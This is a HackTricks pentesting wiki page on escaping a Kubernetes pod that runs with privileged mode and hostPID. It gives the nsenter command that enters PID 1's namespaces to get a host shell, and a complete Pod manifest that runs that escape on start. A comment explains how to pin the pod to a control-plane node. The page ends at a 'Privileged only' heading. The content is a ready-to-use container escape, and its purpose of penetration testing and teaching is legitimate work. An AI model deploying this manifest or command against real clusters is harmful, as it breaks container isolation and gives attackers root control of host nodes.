HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Pod Escape Privileges
Support HackTricks and get benefits!

Privileged and hostPID

With these privileges you will have access to the hosts processes and enough privileges to enter inside the namespace of one of the host processes. Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
Just executing something like the following will allow you to escape from the pod:
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
Configuration example:
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Privileged only

Support HackTricks and get benefits!